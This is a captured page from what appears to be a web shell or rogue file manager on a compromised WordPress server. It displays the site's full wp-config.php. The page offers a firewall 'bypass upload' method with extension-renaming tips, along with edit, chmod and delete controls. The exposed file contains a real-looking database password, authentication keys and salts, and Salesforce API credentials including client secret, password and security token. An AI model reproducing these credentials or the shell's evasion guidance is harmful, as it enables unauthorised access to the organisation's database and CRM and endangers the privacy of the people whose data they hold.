Search
Search
Search
Search
Information
Information
Light
Dark
Open actions menu
Basic upload method
Bypass upload method
Tips!
If you encounter an error (by firewall) while uploading using both methods,
try changing extension of the file before uploading it and rename it right after.
This uploader supports multiple file upload.
Submit
~
var
www
nea-2020.wpress.dk
public
File Content:
wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'nationaleczema2020' ); /** MySQL database username */ define( 'DB_USER', 'nationaleczema2020' ); /** MySQL database password */ define( 'DB_PASSWORD', 'K9PcXqy8OYk9Pqb' ); /** MySQL hostname */ define( 'DB_HOST', 'localhost' ); /** Database Charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The Database Collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /** * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'AFnH`{Vr?6i!K}{.x^&#ljEqmy?T-UD6M(b/84DO=-0J(N6!28c%iu-$`cp68]o~' ); define( 'SECURE_AUTH_KEY', '^>mx!]e5x(^ty ExQ6{y`h~*.>5)^lch<]v6J,K=o/sGq.(Da]+4RN,P+6P4BvQW' ); define( 'LOGGED_IN_KEY', '2:*y`o1h%=F)W.>r:x@c)nu2<?zf+#0M5J3K1n1u}%s& l|{vMlLNf(M1J@!mXLd' ); define( 'NONCE_KEY', 'B-&4rFV%7~>3z7G$Z#ok?tgN6;n]94&Yy,tX)fuu-iD|@RQ=VyvXB?I?R;v~XchF' ); define( 'AUTH_SALT', 'EaBf]q3P%G^xN+#6pqVJ,*30r2D0y-gGbP3+#,nFOb|u|fcCMR~{H07-W_/;=)(-' ); define( 'SECURE_AUTH_SALT', '.]&Y}~1.=9lBC%TcKX&u[Ph60ICWh!7!VR{2g]/aR&qqfA yTO(RnP4U@9]NvF>x' ); define( 'LOGGED_IN_SALT', 'evt0Hfr$=!,dW?c>mQ]>h!Z3CH44D/(4ZP[ZKJ||kbUs`]V:_i_HjRx^|S8Y)ApR' ); define( 'NONCE_SALT', 'j*(=s:@0^{^W:JI+HL`L#/lvDT&XIb(KULb52TV-^y]/o=r/g@v#XjTMCI^ E3=?' ); define( 'WP_CACHE_KEY_SALT', 'Q_5!>djmNlLOyu:c2lG]6M=m6LiFbD%XB]F$k%Sg_[:2q9Zr?<QZ%Fb<%5X0 `VZ' ); define( 'WP_DEBUG', false ); define('WP_DEBUG_DISPLAY', false ); define( 'WP_DEBUG_LOG', true ); /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; /* Salesforce Integration */ define( 'NEA\SALESFORCE\CLIENT_ID', '3MVG98XJQQAccJQczVwQ_hjW9t4UydTCy2UVTpiown4dLlMaf30RzHBfTTlPQ4f_UQ39XJctL2NYPQcJDjB.V' ); define( 'NEA\SALESFORCE\CLIENT_SECRET', '55D8239533D5D2BA8657C409B452475245B114C0BF66F40D75479E1A5C3C90D2' ); define( 'NEA\SALESFORCE\USERNAME', 'apiuser@nationaleczema.org' ); define( 'NEA\SALESFORCE\PASSWORD', 'fNTuHF2703xE' ); define( 'NEA\SALESFORCE\SECURITY_TOKEN', 'kbi3d6P1VsjkauOc2EWsbh1fW' ); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', dirname( __FILE__ ) . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Edit
Download
Unzip
Chmod
Delete